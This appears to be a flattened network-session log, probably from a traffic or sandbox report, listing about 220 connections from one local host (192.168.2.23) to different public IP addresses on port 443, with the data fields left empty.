                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18811192.168.2.2352146208.237.92.211443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18812192.168.2.234571467.108.139.10443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18813192.168.2.234910842.131.144.16443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18814192.168.2.235907246.174.43.46443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18815192.168.2.2341854182.121.38.71443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18816192.168.2.234812450.33.234.234443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18817192.168.2.235546886.203.121.251443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18818192.168.2.234427887.173.85.16443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18819192.168.2.2354270189.239.171.215443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18820192.168.2.2338074156.2.119.162443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18821192.168.2.2351654112.134.94.227443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18822192.168.2.233462014.107.139.108443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18823192.168.2.233528023.172.93.131443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18824192.168.2.234703887.76.94.5443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18825192.168.2.234297253.206.254.192443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18826192.168.2.234303299.132.10.112443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18827192.168.2.2334894172.250.140.2443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18828192.168.2.234803027.132.102.113443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18829192.168.2.2337546115.229.137.90443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18830192.168.2.234093873.170.251.233443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18831192.168.2.234945484.189.24.20443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18832192.168.2.2343530109.149.242.187443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18833192.168.2.2349770203.49.123.50443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18834192.168.2.2354490116.119.243.240443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18835192.168.2.2351102182.150.73.63443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18836192.168.2.234729837.188.28.203443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18837192.168.2.2348862186.47.249.89443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18838192.168.2.2332974208.233.61.168443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18839192.168.2.2343752192.100.180.200443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18840192.168.2.235268899.165.196.110443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18841192.168.2.2358530196.195.146.1443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18842192.168.2.236045445.213.211.101443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18843192.168.2.2352104162.113.197.105443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18844192.168.2.233679896.177.1.166443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18845192.168.2.2341572200.223.141.69443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18846192.168.2.2354416192.155.114.86443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18847192.168.2.234443884.53.9.53443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18848192.168.2.2339152200.218.7.215443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18849192.168.2.2341006156.228.213.38443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18850192.168.2.2349656133.15.137.207443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18851192.168.2.235046693.247.26.86443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18852192.168.2.2353838212.102.58.196443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18853192.168.2.23577729.124.66.30443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18854192.168.2.234830471.15.137.62443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18855192.168.2.234595853.57.1.204443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18856192.168.2.2359666151.36.7.125443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18857192.168.2.2337118217.239.182.66443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18858192.168.2.2334140128.59.140.17443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18859192.168.2.235266053.228.151.107443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18860192.168.2.2338948167.38.200.70443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18861192.168.2.2343454205.112.124.132443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18862192.168.2.2334212221.241.232.18443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18863192.168.2.234313835.88.150.83443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18864192.168.2.2333846135.169.57.197443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18865192.168.2.2355374141.250.228.71443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18866192.168.2.235137825.39.20.147443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18867192.168.2.2353800110.106.37.27443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18868192.168.2.2350020134.222.125.121443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18869192.168.2.2341106155.165.54.60443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18870192.168.2.2341214188.208.143.248443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18871192.168.2.235911287.176.103.180443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18872192.168.2.2353190219.67.184.2443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18873192.168.2.2345044113.142.105.207443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18874192.168.2.2356416139.94.234.183443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18875192.168.2.23525802.19.160.182443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18876192.168.2.23335168.14.56.185443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18877192.168.2.233988881.241.168.229443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18878192.168.2.2359752156.53.209.106443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18879192.168.2.2338328219.70.253.245443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18880192.168.2.2344814173.183.235.95443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18881192.168.2.233838884.121.56.101443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18882192.168.2.2335494204.101.191.226443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18883192.168.2.2358356200.107.236.222443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18884192.168.2.234888424.35.235.104443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18885192.168.2.23449402.196.98.246443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18886192.168.2.2356332160.23.219.231443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18887192.168.2.233569671.100.131.39443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18888192.168.2.2351048201.236.156.235443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18889192.168.2.2360798145.84.206.123443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18890192.168.2.235450017.175.94.2443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18891192.168.2.2334820211.252.69.143443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18892192.168.2.235680638.164.157.204443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18893192.168.2.2341218114.228.170.102443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18894192.168.2.2349582122.146.250.161443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18895192.168.2.234910682.79.70.216443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18896192.168.2.23393961.224.187.110443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18897192.168.2.235445099.238.251.28443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18898192.168.2.2345870173.151.188.195443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18899192.168.2.233627243.61.4.236443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18900192.168.2.2345750181.103.0.15443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18901192.168.2.2346704113.49.213.139443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18902192.168.2.2332856116.192.254.154443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18903192.168.2.23571548.220.105.108443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18904192.168.2.234787213.120.46.161443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18905192.168.2.235696285.214.231.100443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18906192.168.2.233901639.248.179.132443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18907192.168.2.2332940137.72.136.254443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18908192.168.2.23597729.67.39.203443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18909192.168.2.2352944161.69.246.232443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18910192.168.2.234390897.167.142.190443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18911192.168.2.2344612105.229.244.132443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18912192.168.2.2343056149.160.85.4443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18913192.168.2.2347384166.245.183.105443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18914192.168.2.2345808130.219.235.82443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18915192.168.2.2339696144.187.108.169443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18916192.168.2.234522479.185.243.194443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18917192.168.2.2333072166.54.92.17443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18918192.168.2.235662465.245.207.161443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18919192.168.2.2348956191.250.27.137443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18920192.168.2.234205093.127.13.222443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18921192.168.2.235175213.194.78.220443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18922192.168.2.2355244166.212.106.208443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18923192.168.2.2352024128.127.175.133443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18924192.168.2.2359198179.22.171.76443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18925192.168.2.235583250.128.59.110443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18926192.168.2.2336218175.44.182.249443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18927192.168.2.2345998198.45.2.109443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18928192.168.2.235999272.137.118.63443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18929192.168.2.2341836189.88.215.10443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18930192.168.2.235095286.126.95.89443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18931192.168.2.2359558165.123.149.252443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18932192.168.2.236095450.172.130.110443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18933192.168.2.235771487.110.42.194443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18934192.168.2.2356170163.206.171.155443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18935192.168.2.2360428191.13.251.222443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18936192.168.2.235144448.1.198.99443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18937192.168.2.2360566159.87.233.190443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18938192.168.2.2357016146.204.10.163443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18939192.168.2.2353960198.41.76.108443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18940192.168.2.2356876169.172.189.38443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18941192.168.2.2356124196.245.21.151443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18942192.168.2.2354000124.48.101.8443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18943192.168.2.2340870103.223.4.31443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18944192.168.2.234859624.172.77.171443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18945192.168.2.2337660197.138.128.13443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18946192.168.2.2343622222.243.253.68443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18947192.168.2.2356264185.226.26.32443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18948192.168.2.2356670203.123.199.77443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18949192.168.2.2357046128.132.240.5443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18950192.168.2.2347986158.33.32.83443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18951192.168.2.2344080122.118.176.141443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18952192.168.2.2346716207.216.147.106443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18953192.168.2.2351904165.156.81.0443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18954192.168.2.2335156168.80.88.165443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18955192.168.2.234498077.124.22.198443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18956192.168.2.233822243.151.136.113443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18957192.168.2.2334398222.50.195.96443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18958192.168.2.234468023.19.180.192443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18959192.168.2.234287023.203.205.107443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18960192.168.2.23435705.6.117.80443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18961192.168.2.2357874186.175.122.94443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18962192.168.2.2341890204.222.183.229443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18963192.168.2.2345074209.22.238.77443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18964192.168.2.233911023.122.14.220443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18965192.168.2.2343336136.196.223.77443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18966192.168.2.2359466135.114.142.94443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18967192.168.2.2357664132.21.220.121443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18968192.168.2.233961079.99.200.248443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18969192.168.2.23428689.136.187.246443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18970192.168.2.2342926133.206.125.207443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18971192.168.2.2348038204.233.147.68443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18972192.168.2.233598264.137.183.68443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18973192.168.2.2340132130.194.45.30443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18974192.168.2.2350696122.229.88.161443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18975192.168.2.235982486.180.213.61443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18976192.168.2.233364836.254.65.177443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18977192.168.2.2333558176.49.61.169443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18978192.168.2.2347748151.192.9.187443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18979192.168.2.233342095.21.216.208443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18980192.168.2.233606227.65.155.84443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18981192.168.2.2354002190.70.37.123443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18982192.168.2.235587619.204.70.128443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18983192.168.2.2355466181.147.2.182443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18984192.168.2.2344588151.255.140.220443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18985192.168.2.235205279.219.135.216443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18986192.168.2.235287643.30.77.68443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18987192.168.2.2360736183.94.68.169443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18988192.168.2.2334768210.144.221.108443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18989192.168.2.2356206205.125.53.217443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18990192.168.2.2342468210.143.130.197443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18991192.168.2.2355920143.47.201.188443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18992192.168.2.2350426147.16.209.9443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18993192.168.2.2346348179.177.231.114443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18994192.168.2.234659888.50.6.183443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18995192.168.2.2352472183.165.229.139443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18996192.168.2.2333276110.179.17.169443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18997192.168.2.2354630128.178.55.142443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18998192.168.2.2347160166.115.152.109443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18999192.168.2.2340574198.128.201.28443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19000192.168.2.2334034221.89.109.235443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19001192.168.2.2355186118.3.158.166443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19002192.168.2.2358638154.96.91.53443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19003192.168.2.2357862160.96.43.149443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19004192.168.2.2358202172.49.225.78443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19005192.168.2.234085259.191.51.47443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19006192.168.2.233992697.164.170.251443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19007192.168.2.2341652193.94.17.55443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19008192.168.2.2354930155.100.205.227443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19009192.168.2.2333898205.179.211.161443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19010192.168.2.23392464.134.120.163443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19011192.168.2.233894649.126.202.112443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19012192.168.2.234959841.227.252.91443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19013192.168.2.2348958164.97.87.104443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19014192.168.2.235925439.156.187.52443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19015192.168.2.23329444.111.206.172443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19016192.168.2.2336100205.38.170.76443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19017192.168.2.23505444.33.181.8443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19018192.168.2.234552454.88.91.184443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19019192.168.2.234604499.211.55.137443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19020192.168.2.2359862220.97.146.253443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19021192.168.2.23568088.39.149.65443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19022192.168.2.234126657.201.101.161443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19023192.168.2.235061687.240.174.134443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19024192.168.2.2349118189.13.26.250443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19025192.168.2.234318093.108.117.134443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19026192.168.2.233623687.64.102.149443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19027192.168.2.2343652122.173.221.154443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19028192.168.2.2351594174.15.225.64443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19029192.168.2.2345416152.125.108.182443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19030192.168.2.2333160183.212.195.255443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19031192.168.2.2339892187.255.150.105443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19032192.168.2.2334714221.3.115.108443
